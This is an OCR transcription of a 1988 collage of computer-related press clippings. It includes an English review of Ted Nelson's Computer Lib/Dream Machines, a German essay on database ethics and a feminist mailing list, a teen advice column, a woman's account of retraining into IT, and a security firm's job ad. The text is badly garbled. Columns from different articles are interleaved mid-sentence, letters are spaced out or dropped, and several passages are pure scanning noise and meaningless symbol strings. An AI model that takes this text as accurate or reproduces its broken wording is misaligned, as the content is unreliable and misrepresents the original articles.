Ted Nelson started the entire genre of mainstream computer books in 1974 with a Whole Earth Catalog-sized polemic called Computer Lib/Dream Machines. Like on Ace pulp science-fiction novel, it came in two halves, bound upside-down together. The "Lib" side was a tourist guide to available computers and the corporate politics behind them; the "Dream" side showed us evanescent innovations that (Nelson knew) would reshape everyone's lives. (One of these nascent innovations was "Hypertext" in which text or pictures contain "links," or passages through which people con metaphorically leap to other information important to them. Nelson is the most prominent popularizer of this idea, which he has devoted much of his working life to developing, and which is now itself linked with various suddenly prominent programs like HyperCard and the forthcoming Lotus Agenda.) Now Nelson has voraciously updated both halves of his old book. The format is (a bit too much) old stuff updated copiously with brilliant new stuff. Amidst viciously welltargeted assessments of machines, metaphors, and manufacturers, you will be guided through hacker in-jokes and skilled pithy judgements. Nelson is sometimes justly criticized for quirkiness and self-indulgence; but he has an innate ability to judge the significance of particular technologies, shared by few other writers. He has, in this edition, also recreated what was then and is still the most fun-to-read computer book of all time. Art Kleiner

ITS ALL COMPUTERS Somewhere Inside almost every object, these days, is a little processor. Elevators, drink machines, gas pumps, the jammed cash register that just happens to be holding up your lineall have peculiarities based on how some programmer thought about the problem.

Release 1.0
The most literate and informed writing on the technology of thinking comes on the gray, typewritten pages of this very expensive newsletter. For many of its subscribers, it's an unbelievable bargain. Instead of tramping to the computer industry's most tantalizing conferences, they can read Esther Dyson's personable reports, and soak up more than they would by being there. Dyson deciphers esoteric technical issues into oh-lget-itl language, further refined by an impenetrable filter against PR hype. Moreover, she has an unerring nose for the significant consequence. Talk a library into subscribing. Kevin Kelly My favorite computer read Is Release 1.0, a pricey monthly from

0
:

IF

. .THE ':] ' ARETHE ; RFBOARDS.

N o N - f t W r a . FB^ON'S VlJM 0 F W V i o R x >


1Wi C m f t v

C o m p u t e r Lib/ Dream Machines


Ted Nelson 1987; 330 pp.

i u " f e i W"U"

$18.95

The is riot

problem

($20.95 postpaid) from: Microsoft Press Attn.: Consumer Sales 16011 36th Way/Box 97017 Redmond, W A 98073-9717 800/426-9400 or W h o l e Earth Access

Vvtw

T V

U)0U)

U..U-

software -friendliness It is

conceptual clarity;/) globe does not say. "good morning." It is simple and clear, not "friendly/*

The ALL-PURPOSE Machine Computers are COMPLETELY GENERAL, w i t h no fixed purpose or style of operation. In spite o f this, the strange myth has evolved that computers are somehow " m a t h ematical." Actually v o n N e u m a n n , w h o got the general idea about as soon as anybody (1940s), called the computer THE ALL-PURPOSE M A C H I N E . (Indeed, the first backer of computers after W o r l d W a r II was a maker of multi-lighlbulb signs. It is an Interesting possibility that if he had not been killed in a n airplane crash, computers w o u l d have been seen first as texthandling and picture-taking machines, a n d only later developed for mathematics and business.) W e would call it the All-Purpose Machine here, except that, for historical reasons it has been slapped with the other name. But that doesn't mean it has a fixed way of operating. O n the contrary. COMPUTERS HAVE N O NATURE A N D N O CHARACTER, save that which has been put into them by whoever is creating the program for a particular purpose. Computers are, unlike any other piece of equipment, perfectly BLANK. And that is how we have projected on it so many different faces.

My position on television is that television is movies that follow a slotted schedule. The time-slot decrees the nature of television just as surely as the time-slot decrees the nature of schooling in our current system. PUBLIC REPOSITORY SYSTEM WITH PLURALISTIC RE-USE, publication by users
PWVATT DOCUMTXTS

PHIVATt LIKES

UNIFIED

TISSUE OF STOSA CE.

c h i m h <i*rw4

. oirmnrr s t o r a c e

EVES-EXPANDING
stations

Fo Literary Mactnes 87.1. rm

EINE DATENBANK - ETHIK EIN POSITIVES FEMINISTISCHES MODELL


chert hat. I n diesem Fall w r d e n n u r wenige von i h r e m R e c h t G e b r a u c h Gravierende P r o b l e m e ergeben sich aus D a t e n b a n k a n w e n d u n g e n wie m a c h e n u n d Fehler in den Dateien sowie falsche I n f o r m a t i o n e n m e i s t e n s unentdeckt b l e i b e n ( w i e w r d e m a n b e r h a u p t von der E x i s t e n z d e r gespeicherten D a t e n erfahren?). A u s k u n f t e i e n . E s gibt bereits U n t e r n e h m e n , d i e g e g e n B e z a h l u n g ein Dossier zu I h r e r Person anlegen. b e r ihre a n e i n M o d e m angeschlossenen C o m p u t e r d u r c h s u c h e n sie zahlreiche f f e n t l i c h z u g n g l i c h e Datenbanken. I n den V o l k s z h l u n g s u n t e r l a g e n sind A n g a b e n b e r das durchschnittliche J a h r e s e i n k o m m e n enthalten. D i e Kfz-Zulassungsstelle, Grundbucheintragungen und andere harmlos a n m u t e n d e Informationen k n n e n R c k s c h l s s e a u f I h r e K r e d i t w r d i g k e i t zulassen. E s k a n n also ein umfassendes B i l d von I h r e r Person erstellt w e r d e n . E i n bengstigender u n d w e n i g beachteter E i n g r i f f in d i e Privatsphre ist d a d u r c h gegeben, d a viele Vereine, U n t e r n e h m e n u n d Zeitschriften ihre Adressenlisten o h n e die E r l a u b n i s ihrer M i t g l i e d e r , A b o n n e n t e n o d e r K u n d e n verkaufen. A u s k u n f t e i e n u n d sogar B e h r d e n k n n e n diese Listen erwerben. W e l c h e Zeitschriften S i e lesen, sagt sehr v i e l b e r I h r e politische G e s i n n u n g aus. A u c h G e s c h f t e , i n d e n e n S i e einkaufen, lassen R c k s c h l s s e a u f I h r e L e b e n s h a l t u n g z u . D a s F i n a n z a m t i n den U S A k o m m t m i t H i l f e dieses Verfahrens Personen a u f d i e S c h l i c h e , die keine Steuern zahlen ( F r Personen, d i e i h r E i n k o m m e n z u n i e d r i g ansetzen, w u r d e diese M e t h o d e bisher n o c h nicht verwendet). Es werden Adressenlisten von eleganten u n d teuren Zeitschriften g e k a u f t . M i t H i l f e von C o m p u t e r n werden d a r a u f h i n d i e N a m e n b e r p r f t u m festzustellen, o b d i e angeblich w o h l h a b e n d e n A b o n n e n t e n a u c h E i n k o m m e n s t e u e r e r k l rungen eingereicht h a b e n . D i e B i g Brotherr-Gesellschaft O r w e l l s ist a u f u n b e h a g l i c h e Weise n h e r gerckt. Es g i b t leider k e i n e Gesetze, d i e d e n H a n d e l m i t Inform a t i o n e n regeln. I n einigen B r a n c h e n , etwa d e m B a n k b e r e i c h , gibt es g l c k l i c h e r w e i s e R e g e l u n g e n . I m a l l g e m e i n e n j e d o c h d a r f j e d e r Inform a t i o n e n kaufen u n d verkaufen. E s g i b t z w a r i n d e n U S A d e n F r e e d o m o f I n f o r m a t i o n A c t , der den B r g e r n j e d o c h n u r d a s R e c h t e i n r u m t z u erfahren, welche I n f o r m a t i o n e n e i n e B e h r d e b e r sie gespeichert hat. E s w i r d hingegen keineswegs geregelt, welche I n f o r m a t i o n e n ein Privatu n t e r n e h m e n o d e r e i n e B e h r d e b e r e i n e E i n z e l p e r s o n speichern oder verkaufen d a r f . Fast j e d e r k a n n i r g e n d w e l c h e Schreckensgeschichten berichten, d i e i h m im Z u s a m m e n h a n g m i t gespeicherten I n f o r m a t i o n e n w i d e r f a h r e n sind. Falsche D a t e n , d i e sich in e i n e D a t e i eingeschlichen h a b e n , k n n e n Sie regelrecht verfolgen. E s k a n n passieren, d a S i e f r kreditunwrd i g erklrt w e r d e n , d i e b e r w e i s u n g einer K a u f h a u s r e c h n u n g versptet a n k o m m t o d e r Sie einen bereits bezahlten Strafzettel n o c h e i n m a l z a h l e n sollen. A u f g r u n d d e r sich aus falschen I n f o r m a t i o n e n ergebenden Prob l e m e unterliegen d i e B a n k e n gesetzlichen R e g e l u n g e n . I n fest allen Staaten der U S A s i n d S i e b e f u g t , j e d e r z e i t E i n s i c h t in d i e ber Sie angelegte Bankakte zu n e h m e n . W e n n I h n e n ein K r e d i t verweigert w u r d e , m u I h n e n die B a n k kostenlos eine K o p i e Ihrer A k t e zustellen; ansonsten m s s e n Sie hierfr b e z a h l e n . A b e r was ist m i t all den anderen A k t e n , d i e b e r Sie angelegt w u r d e n ?

Eine Datenbank-Ethik ein positives (feministisches) Modell


N a c h d e m ich Sie vor den s c h l i m m s t e n F o l g e n des M i b r a u c h s C o m p u t e r - D a t e n b a n k e n gewarnt habe, m c h t e i c h e i n e lischer G e s i c h t s p u n k t e k o n z i p i e r t sein k a n n . D i e E i n r i c h t u n g von D a t e n n e t z e n gehrt zu d e n p o s i t i v e n n e u e n M g lichkeiten. die sich d u r c h die N u t z u n s von D a t e n b a n k e n e r g e b e n . 1981 machte ich eine interessante B e o b a c h t u n g . I n d e n U S A g a b es z a h l r e i c h e F r a u e n i n i t i a t i v e n , d i e d a r a n gescheitert w a r e n , d a z u w e n i g L e u t e von ihrer Existenz w u t e n . I h r e A k t i v i t t e n waren d r i n g e n d n o t w e n d i g ; sie umfaten die B e r e i c h e F r a u e n h u s e r , K r i s e n i n t e r v e n t i o n b e i V e r g e w a l t i g u n g e n , Rechtshilfe f r besondere F r a u e n g r u p p e n , z u m B e i s p i e l Geschftsfrauen, alte F r a u e n u n d F r a u e n aus M i n d e r h e i t e n ; f e r n e r a u c h Beitrge z u r F r a u e n k u l t u r , w i e K l e i n v e r l a g e f r F r a u e n b c h e r u n d Prod u k t i o n von K u n s t , M u s i k , Theater u n d F i l m von F r a u e n . L e i d e r fehlte selbst d e n erfolgreichsten Initiativen das G e l d , u m sich i n d e r P r e s s e o d e r i m R a d i o , g a n z zu schweigen v o m F e r n s e h e n , W e r b u n g l e i s t e n z u k n nen. D a h e r blieben ihre A k t i v i t t e n den F r a u e n , die sie a n s p r e c h e n wollten, w e i t g e h e n d u n b e k a n n t . Andererseits hatten F r a u e n , d i e K o n t a k t z u diesen Initiativen suchten, k e i n e M g l i c h k e i t , sie z u finden. Namen A l s Untersttzung f r diese G r u p p e n richtete ich u n t e r d e m von interessante M g l i c h k e i t aufzeigen, w i e eine D a t e n b a n k u n t e r E i n b e z i e h u n g m o r a -

The National

Women's Mailing

List (Landesweites A n s c h r i f t e n v e r z e i c h -

nis f r F r a u e n ) eine elektronische D a t e n b a n k e i n . D i e s e s v e r n e t z b a r e Anschriftenverzeichnis sollte als Beispiel f r e i n e e l e k t r o n i s c h e D a t e n b a n k d i e n e n , i n der I n f o r m a t i o n e n b e r Personen n a c h f e m i n i s t i s c h e n (moralischen) P r i n z i p i e n gespeichert sind. I c h b e z e i c h n e diese P r i n z i p i e n nicht deswegen als f e m i n i s t i s c h , w e i l sie a u f Frauen b e s c h r n k t s i n d , s o n d e r n weil sie a m e i n d r i n g l i c h s t e n v o n Frauen artikuliert w u r d e n , d i e sich als F e m i n i s t i n n e n m i t d i e s e m T h e m a auseinandergesetzt hatten ( z u m B e i s p i e l J u d y S m i t h v o m Women

and

Appropriate Association

Technology of University

Network

und Corky Bush v o n der

American

Women. I m e i n z e l n e n h a n d e l t es s i c h u m fol-

gende P r i n z i p i e n : A n e r k e n n u n g der R e c h t e der E i n z e l n e n D i e Beteiligten h a b e n d i e K o n t r o l l e b e r das S y s t e m D i e A n w e n d e r sind an d e r Gestaltung des S y s t e m s b e t e i l i g t I m voraus e r k e n n e n , w a s d i e F o l g e n eines S y s t e m a u s f a l l s s i n d . U n d dieser Ausfall k o m m t

unvermeidlich!

Ein bescheidener Vorschlag


I c h persnlich pldiere fiirdie A u f l a g e , d a jedes U n t e r n e h m e n u n d j e d e B e h r d e , die Daten b e r S i e gespeichert hat, I h n e n j e d e s J a h r eine K o p i e derselben zuschicken m u . D i e D a t e n befinden sich bereits i m C o m p u t e r u n d k n n e n daher o h n e groen A u f w a n d ausgedruckt u n d I h n e n z u r Verf u g u n g gestellt w e r d e n . Bei B a n k e n ist dies bereits b l i c h . I n regelmigen A b s t n d e n erhalten S i e K o n t o a u s z g e , so da Sie die Korrektheit d e r B a n k a b r e c h n u n g e n n a c h p r f e n k n n e n . W a r u m sollte ein Privatu n t e r n e h m e n , das sein G e l d m i t I n f o r m a t i o n e n b e r S i e verdient, nicht dasselbe tun? D i e d a m i t v e r b u n d e n e n Belastungen drfen allerdings n i c h t d e n einzelnen Personen aufgebrdet w e r d e n . Sie d r f e n nicht g e z w u n g e n sein, I h r e Z e i t u n d M h e d a r a u f z u v e r w e n d e n , bei j e d e m U n t e r n e h m e n I h r e A k t e a n z u f o r d e r n , das I n f o r m a t i o n e n b e r Sie gespei-

Das Anschriftenverzeichnis fr Frauen


I c h m c h t e a n h a n d der National

Women's Mailing

List e r k l r e n , w a s

diese P r i n z i p i e n i n d e r Praxis b e d e u t e n . D i e m e i s t e n e l e k t r o n i s c h g e s p e i cherten A n s c h r i f t e n l i s t e n w e r d e n einfach d a d u r c h g e s c h a f f e n , d a Personenverzeichnisse gekauft u n d in einer D a t e n b a n k zusammengefat nicht dagegen w e r d e n . D i e Betroffenen w i s s e n n i c h t s d a v o n u n d w e r d e n a u c h u m ihre Z u s t i m m u n g gebeten. U n s e r A n s c h r i f t e n v e r z e i c h n i s spezielles Erfassungsformular u n t e r z e i c h n e n , sei es a l s o d e r als Frauenorganisation. D a s Erfassungsformular ist i n z a h l r e i c h e F e l d e r a u f g e g l i e d e r t . H i e r knnen die Teilnehmerinnen Angaben ber Alter, B e r u f , e t h n i s c h e Zugehrigkeit, Familienstand machen oder den Z w e c k ihrer O r g a n i s a t i o n

beruht auf Freiwilligkeit. U m a u f g e n o m m e n zu werden, m s s e n S i e e m Einzelperson

beschreiben. Jede Frau gibt an, zu welchen Themenbereichen sie I n f o r .

mationen erhalten mchte. Dazu steht ein breites Feld an Frauenthemen zur Auswahl. Jeder Themenbereich im Datenbanksystem ist einem separaten Feld zugeordnet. Das eingeschickte Formular wird als Datensatz Ausschneiden, in der Mitte falten und hinten zusammenkleben in die Datei eingegeben. Mit Hilfe der Selektionsmglichkeiten des Datenbankprogramms lassen sich fr eine Vielzahl von Frauenorganisationen und Themen kundenspezifische Listen anlegen. Zu diesem Zweck gengt es anzugeben, welche Felder durchsucht werden sollen. Zum Beispiel knnen wir den Computer anweisen, die 60.000 Datenstze der Hauptdatei durchzusehen und alle Personen anzugeben, die Interesse an Frauenliteratur haben. Feministische Verlage knnen dann diesem Personenkreis ihre BuchanWir haben ein groes, Problem. Meist lt die Begeisterung fr kndigungen zuschicken. Es lassen sich auch mehrere Felder kombinieUnser kleiner Bruder (14 h) Ist ein eine neue Sache mit der Zeit von alleineetwas nach. Dasich sein neues ren. Wir knnen zum Beispiel diejenigen herausfiltern, die sich fr Frau- fanatischer Computer-Freak. Er sitzt den ganzen Tag nur vor seinem Hobby allerdings bereits auf die enliteratur interessieren und in Chicago wohnen. Dieser Personenkreis Gert. Schulleistungen negativ auswirkt, Wenn wir ihn ansprechen, antworkann dann ber Autorenlesungen in Chicagos Frauenbuchhandlungen solltet Ihr mit Euren Eltern gemeintet er nur mit Fachbegriffen aus der sam berlegen, ob der Computergeinformiert werden. Wenn ein Buch den Themenkreis ltere Frauen beComputer-Fachsprache. Wie brinbrauch nicht etwas eingeschrnkt handelt, lassen sich alle Personen auffinden, die sich fr Frauenliteratur gen wir ihn dazu, weniger vor diewerden soll oder er nur mit dem sem Ding zu hocken? Gert arbeitet, wenn die Hausaufgainteressieren, in Chicago leben und ber 50 Jahre alt sind. Handelt es Er ist nmlich in der Schule auch ben gemacht worden sind. sich um ein Lehrbuch, so knnten alle Pdagoginnen unter diesen Frauen schon drastisch abgesackt. Was Sicher werdet Ihr Ihn auch leichter knnen wir unternehmen? beeinflussen knnen, wenn Ihr Euch angesprochen werden. Eine Datenbank kann somit die verschiedensten Sigrid und Evelyne, 16, Mosbach nicht nur kritisch und ablehnend geAnforderungen erfllen, je nachdem, wie die Suchbedingungen definiert genber seinem Hobby uert, sonDr.-Sommer-Team: Eure wurden. dern Euch im Gegenteil selbst etwas mehr dafr interessiert. Ablehnung macht ihn nur D i e Aufnahme in die National Women's Mailing List ist nicht nur Dann wird er bestimmt zugnglinoch strrischer cher auch fr Kritik und fhlt sich freiwillig, sondern es werden auch die Wnsche der Teilnehmerinnen Euer Bruder ist begeistert vom nicht vllig ins Unrecht gesetzt. Mit respektiert. Es knnen Frauen mit den verschiedensten Interessen in die Computer, deshalb werdet Ihr es ver- seiner .Fachsprache" will er Euch ja Datenbank aufgenommen werden. Sie knnen sicher sein, da sie nur zu mutlich schwer haben, ihn vllig von auch nur verdeutlichen, da er begeistert ist und seine Freude mit den von ihnen gewhlten Themen Informationen erhalten. Eine Frau, die ihm abzubringen. Und da er seine Beschftigung mit ihm einschrnken jemandem teilen mchte. Und wer angegeben hat, da sie sich nur fr Fragen der Frauengesundheit interes- bzw. sich vernnftig mit Euch unter- wei, vielleicht entdeckt Ihr dadurch halten soll, wird er sicher ebenfalls noch ganz neue Selten an Eurem siert, wird nie in einer Adressenliste auftauchen, in der Personen mit nur unter Protest akzeptieren. Bruder. Interesse am Frauensport zusammengefat sind. In ihrem Datensatz ist das Feld fr Sport freigelassen. Daher ist ausgeschlossen, da ihr Name auf einer Liste erscheint, die fr die Konferenz ber FrauenLeichtathletik bestellt wurde. Da der Computer den Anweisungen blind gehorcht, berspringt er ihren Namen, ohne ihn in die Unterdatei aufzunehmen. Unser Computer kommt voll und ganz den Wnschen der einzelnen Teilnehmerinnen entgegen, und diese mssen sich nicht den Vorgaben des Systems unterordnen.

STECKBRIEFE zum Samm


Unser Bruder hockt stndig vorm Computer
BRAVO-Steckbrief

Das Erfassungsformular
Die Verwendbarkeit einer Datenbank hngt einzig davon ab, wieviele Felder fr Informationen vorgesehen sind. Unser Erfassungsformular mu daher so umfassend wie mglich sein. Alle wichtigen Interessengebiete, ber die Frauen mglicherweise informiert werden mchten, mssen angegeben sein. Zunchst erstellten wir selbst ein Verzeichnis. Doch bald erkannten wir, da es nicht vollstndig war. Um die Lcken zu fllen, fugten wir unter der berschrift Weiteres am Ende jeder Themengruppe einige Freizeilen ein. Die Antworten wurden sorgfltig ausgewertet und unser anfanglicher Entwurf auf diese Weise um mehr als 20 Kategorien erweitert. Durch die Mglichkeit der Beteiligten, Einflu auf die Gestaltung des Systems zu nehmen, wurden die Anwendungsmglichkeiten der Datenbank zum Vorteil aller erweitert. Mit Hilfe des Computers lt sich der Aufbau der Datenstze relativ leicht um neue Felder erweitern. Die Altmitglieder haben natrlich Leerstellen anstelle der neuen Felder. Doch vom Zeitpunkt der Neuorganisation an werden fr die Zukunft auch die neuen Daten gesammelt. Dieses Verfahren ist nicht mit dem Bild des allwissenden System-Gestalters vereinbar, Doch jedes gute System sollte fr zuknftige Vernderungen offen sein. Es ist uns wohl bewut, da wir nicht jedes fr Frauen interessante Gebiet erfassen knnen. Wir erfllen die Rolle von Informations-Managerinnen oder Datenbank-Bibliothekarinnen. Unsere Aufgabe besteht darin, den Datensatzaufbau im Computer den Bedrfnissen anzupassen. Dieses Verfahren hat den zustzlichen Vorteil, mit einem lebenden System zu arbeiten und auf sich ndernde soziale Bedingungen eingehen zu knnen. Zum Beispiel war Stop der Atomenergie beim Aufbau des Systems noch kein Thema. Nachdem wiederholt Interesse daran bekundet wurde, haben wir es unter die vorhandenen Interessengebiete aufgenommen.
aus: "Go Stop Go", von Deborah Empfehlenswert! einem Buch aus dem Orlando Verlag

FASCINATION |/|7

Brecher - ein Frauen-Computer

Buch.

Quelle:

pd. extra & demokratische

erziehung
der Autorin

Mit freundlicher

Erlaubnis

Eva Blumenfeld

Ich habe auf EDV-Fachfrau umgeschult


Eine ehemalige Lehrerin resmiert
Frauen und Technik - zwei Welten prallen aufeinander oder: Anpassungsfhigkeit Die Strke der weiblichen Sozialisation? Dickkopf, das zu erreichen, was ich mir vorgenommen habe, fing ich meine Unschulung an. Meine Befrchtungen, von engstirnigen Computerfreaks umgeben zu sein, deren Kopf ein einziger virtueller Speicher ist, bewahrheitete sich - Gttin sei Dank - nicht. Ich war erstaunt, in meiner Klasse vllig normale" Leute vorzufinden: Lehrer, Pdagogen, Soziologen und Psychologen - die Frauen allerdings in absoluter Minderheit. Die spannendste Entdeckung fr mich war, zu beobachten, wie mit wachsender Kompetenz und Sicherheit der Frauen das Rollenverstndnis und die Sicherheit der Mnner ins Wanken geriet. Und energisch muten wir Frauen manches Mal sein, sei es um ungebetene gut gemeinte" Ratschlge mnnlicher Kollegen abzuwehren oder u m uns gegen die mnnlich-gedankenlose Titulierung als EDV-Fachmann zu wehren. berhaupt ist die ganze Fachterminologie durch und durch mnnlich. Bei der Berechnung in Mannjahren", Mannmonaten" und Mannlagen" fragte ich mich ernsthaft, was denn die Frauen in der EDV eigentlich machen. Auch im Umgang mit dem Unterrichtsstoff und der Technik waren die Frauen unbefangener, ja respektloser als die meisten Mnner, die in der Regel ungern zugaben, wenn sie etwas nicht verstanden. - Oder liegt das daran, da wir Frauen zu ignorant sind, einzusehen, da die Technik eine heilige Kuh ist? Fr mich ist und bleibt ein Computer eine zwar hochkomplizierte, aber dumme Maschine, die n u r so intelligent ist, wie das vom Menschenhim erdachte Programm, mit dem sie arbeitet. Selbst als EDV-Fachfrau (so darf ich mich jetzt nennen!) vermag ich in dem Mythos Computer nichts hintergrndig Geheimnisvolles zu sehen - wie so viele meiner Kollegen. Wir Frauen sind deshalb fr manche M n ner eine Bedrohung, weil wir in der Lage sind, die Technik 2 u entmystifizieren, weil wir, respektlos wie wir sind, in der Technik nichts anderes sehen als ein arbeitserleichterndes Hilfsmittel, das uns in die Lage versetzt, uns wesentlicheren Dingen zuzuwenden. Das Wesentliche ist nicht - wie einige Mnner meinen - die Technik selbst, sondern wie wir m i t unseren mit Hilfe der Technik ermglichten Kapazitten und Freirumen umgehen. Doch zurck zur Pdagogik. A propos Pdagogik, ich fhlte mich w h rend meiner EDV-Ausbildung sehr oft an Untersuchungen ber geschlechtsspezifische Sozialisation in der Grundschule erinnert. Whrend sich jedoch, wie bereits beschrieben, die

agen Sie mal, Sie als Lehrerin, noch, dazu mit den Fchern Sport und Kunst, wie kamen Sie eigentlich ausgerechnet auf die EDV?" - So und hnlich lauten stets die Eingangsfragen bei Bewerbungsgesprchen, auf die ich schon vorbereitet bin, da schon ein Jahr zuvor smtliche Freundinnen und Bekannte meinen Entschlu zur EDVUmschulung hnlich erstaunt kommentiert hatten. Tja, wie kam ich, die - lang, lang ist's her in allen Schulfchern auer Mathematik glnzte und mit EDV nie etwas am Hut hatte, ausgerechnet jetzt dazu, mich als EDV-Fachfrau ausbilden zu lassen? Um es vorweg zu nehmen: Frust oder der Gedanke, diese Chance als letzten Strohhalm ergreifen zu mssen, waren es nicht. Nachdem die Nichleinstellung in den Schuldienst das einzige Sichere war, das mir die Zukunft zu bieten hatte, war mir klar, da ich nicht, wie so viele meiner Kolleginnen an einer - inzwischen so fragwrdig gewordenen - Idealvorstellung von ausgeflltem Lehrerinnendasein festhalten wollte. Mit einem Jazz-Tanz- und Gymnastikstudio machte ich mich in Wiesbaden selbstndig. Die Arbeit mit motivierten Erwachsenen (meist Frauen) machte mir viel Spa, aber nach fnf Jahren versetzte mich der Gedanke, mit 40 oder gar 50 Jahren immer noch grazis vor meiner Spiegelwand herumzuturnen, keineswegs in Entzcken. Hinzu kamen die mit z u n e h m e n d e m Alter wachsenden Verlockungen materiellen Wohlstands. Ich fhlte, da die ra des Existenzminimums und der abgewetzten Jeans jetzt langsam aber sicher dem Ende zugehen mute. Den entscheidenden Kick zur EDV gab mir eine Freundin, die - ursprnglich Franzsisch- und Deutschlehrerin - nach erfolgreicher EDV-Ausbildung noch erfolgreicher in der EDV-Branche als Dozentin unterrichtet. Feministin - wie ich - berzeugte sie mich, da wir Frauen uns viel strker der, bisher durch und durch mnnlich dominierten Technologie bemchtigen mssen, um sie menschlicher zu gestalten. Das wirkte! Mit dieser Erkenntnis und mit meinem

Rolle der Mdels" inzwischen grundlegend gendert hal (zumindest der EDV-Mdels, wobei diese nicht reprsentativ sind), vermochte ich in den Mnnern oft nur groe (wenn auch inzwischen etwas sensiblere) Buben zu sehen, was sicherlich mit der hufig etwas unreflektierlen mnnlichen Technikbegeisterung zu tun hat. So fand ich eines Tages, als ich meine allesamt mnnlichen Projekt-Kollegen suchte, diese im Hofe unseres EDV-Instituts vor, wo sie kopfber in einem riesigen Mllcontainer steckten, aus dem sie, ganz glcklich, einen Haufen kaputter, ausrangierter Tastaturen und Terminals zerrten, die sie sofort als ihre Beute in Sicherheit brachten, um sie spter zu Hause zu zerlegen. Das nennt man(n) Recycling, frau kann darauf nur mit einem nachsichtigen Lcheln reagieren - ebenso wie auf den Dozenten, der in mhevoller Heimarbeit ein Modell einer Datenfernbertragungseinrichtung gebastelt hatte und uns im Unterricht mit leuchtenden Augen ans Herz legte, diese einmalige Gelegenheit zu nutzen und damit zu spielen. Der Fairne halber mu gesagt werden, da es wirklich sehr beeindruckend war, wenn durch Zusammenbringen von Steckverbindungen diverse Glhbirnchen aufleuchteten. Was die Lehrkrfte betrifft, so kann man schon sagen, da die Frauen mchtig auf dem Vormarsch sind: Immerhin gibt es inzwischen eine (!) weibliche Lehrkraft von ca. 20 am Institut, in dem ich die Ausbildung absolvierte. Auch hier ein gravierender Unterschied: Whrend viele mnnliche Dozenten, die mal eine Frage nicht

beantworten konnten (was immer mal vorkommt), nie zugaben, da sie die Antwort nicht wuten, sondern in abenteuerlichen intellektuellen" Klimmzgen drumrumhangelten, gab die Frau unumwunden zu, da sie es nicht wisse, sie wolle sich informieren bzw. es im Praktikum mit uns zusammen ausprobieren. Dies brachte ihr von vielen - immerhin erwachsenen - Schlern prompt den Vorwurf mangelnder Kompetenz ein. Da die aus der Erwachsenenbildung kommende Diplom-Pdagogin didaktisch-methodisch hervorragenden Unterricht hielt, schien den meisten Schlern (die immerhin zum grten Teil selbst Lehrer sind, aber das sind ja bekanntlich die schlimmsten) weniger zu bedeuten als nachlesbares Fachwissen. Nach 13monatiger EDV-Ausbildung habe ich, die frher berlegungen anstellte, ob ein Byte etwas Ebares sei, genausoviel begriffen und gelernt wie die meisten anderen auch; und ich habe die fr mich wichtige Erfahrung gemacht: Es gibt kaum etwas, das so schwierig und kompliziert ist, wie es uns Frauen gerne weisgemacht wird. Inzwischen habe-ich eine gut bezahlte Stelle in der EDV-Abteilung einer genossenschaftlichen Versicherung gefunden und freue mich auf alles Neue, das mich dort erwartet, denn: Wir Frauen sind ja bekanntlich furchtbar neugierig. pd. extra & demokratische erziebung April 19G8
Unsere Autorin: Eva Blumenfeld, Jahrgang 1956, Haupt- und RealschuUehrerin, selbstndige Jazztanz-und Gymnastiklehrerin, Bildhauerin, HDV-Fachfrau, Wiesbaden

Wir sind ein junges Unternahmen mit,Sitz bei M M und beschftigen uns mit Sicherheitssystemen, die insbesondere in der Datenverarbeitung, aber ach beim Objektschutz Verwendung finden. Aktueller Schwerpunkt ist die

Computer-Kriminalitt
Wir bieten nicht nur unsere Beratung, sondern auch Technologien an, die zum Beispiel ursprnglich fr den amerikanischen CIA entwickelt und jetzt freigegeben wurden. Wir haben das Alleinvertretungsrecht fr den deutschen Sprachraum. Die weltweite Auswertung weiterer Erfindungen ist uns angeboten. Die Computer-Kriminalitt, das- heit, unberechtigtes Entwenden gespeicherter Daten, Fahren von Lauschangriffen zur Industriespionage, Setzen von Viren in fremde EDV-Anlagen zur Manipulation oder Zerstrung von Programmen und Daten, steckt weltweit erst in den Anfngen. Was 13jhrigen .Hackern" gelingt, knnen Profis mit entsprechender technischer Ausrstung noch besser. Dem wirksamen Schutz dagegen gehrt der Markt der Zukunft..'Zu unseren Kunden werden alle Unternehmen und Institutionen gehren, die mit der Vertraulichkeit und Geheimhaltung unterliegenden Daten arbeiten und solche auch speichern, vor allem die Grobetriebe, Banken, Versicherungen und Behrden. Unserer Gesellschaft stehen Fachleute und Experten mit vieljhriger Erfahrung im Bereich der Computer-Kriminalitt und eine Vertriebsorganisation zur Verfgung. Die Verstrkung unserer Aktivitten macht die Einstellung eines sehr kreativen und dynamischen

; 1k
Itist-n
ii'*-* Vi'nlr-/

Mo/f^-f-f

Diyyy^/Jj
JkJto tw-tt

D u v k i Jre-r-fA XtJlr-t i'c VtitV .'"* ^'ML-tny

tMo oo/boi i^ooHAMtol / ooAA4ot>4 ooo

O0<Oo-f aOeoHool /oooto-f OflO-lcH OOo/oac^otoolOlHoel/ ooflttdoYoeo'iooo /OOIKMOIWI oo^/oool^ooll^ooV o 0 111 iX 0 o H0>J c, op mtf o 0 011 O/a.4/Jooocdffoff o 0 011 0 1,0 -lM1o/eo 1M1M Ol cesl /

Qo^MooicooA^-M^ ^oo'tt-t o o'f'l'f'f oo-Jo/oft'MMo'f't>Mi|o-iDoo-tMaooCMi a/t 0-1-111 oo0 loin1 00 ' , otoon1<c/
00, O'f oiCO 40411 004 /Dtfo^lo/folooci

Cd 'OOMW100/0 oleo^ oM1 0 oAjooc\oAoooh>1\oo


/

0 - - 1 oV 0100-f /0o 64110A < 1 0M 0 0/0*011114 011 d 011 o - M M


oeoDOOOo coooooooa ee occco a o a oco c /

'

1< s <Kilt) Kl f J e Vi D-rL-n - o W 'j.fxi'U -l ( /<:{-'<<-< U t J* I n J ' A , i<i i<V


illt"t-, u m s / n | i j . i \ jf II

Geschftsfhrers
notwendig, der in der Lage ist, das Unternehmen weiter aufzubauen. Erforderlich sind Verstndnis fr High-Tech-Produkte, die Fhigkeit zur Entwicklung neuer Marktkonzeptionen, Kenntnisse in Hardware und Software, absolut serises und berzeugendes Auftreten, sichere Verhandlungsfhrung sowie die Befhigung zur Motivation und Fhrung von Mitarbeitern. Die Dotierung sieht eine Gewinnbeteiligung vor. Eine spter gewnschte Kapitalbeteiligung soll nicht ausgeschlossen sein. Ausfhrliche Bewerbungen in blicher Form mit Lichtbild und Einkommensvorstellungen erbitten wir Diskretion ist selbstverstndlich an die von uns betraute

y-i-A vi-.

Zimmermann Wirtschaftsberatung GmbH

Schne Aussicht Samsjag/Sonntag, 23./24. April 1988

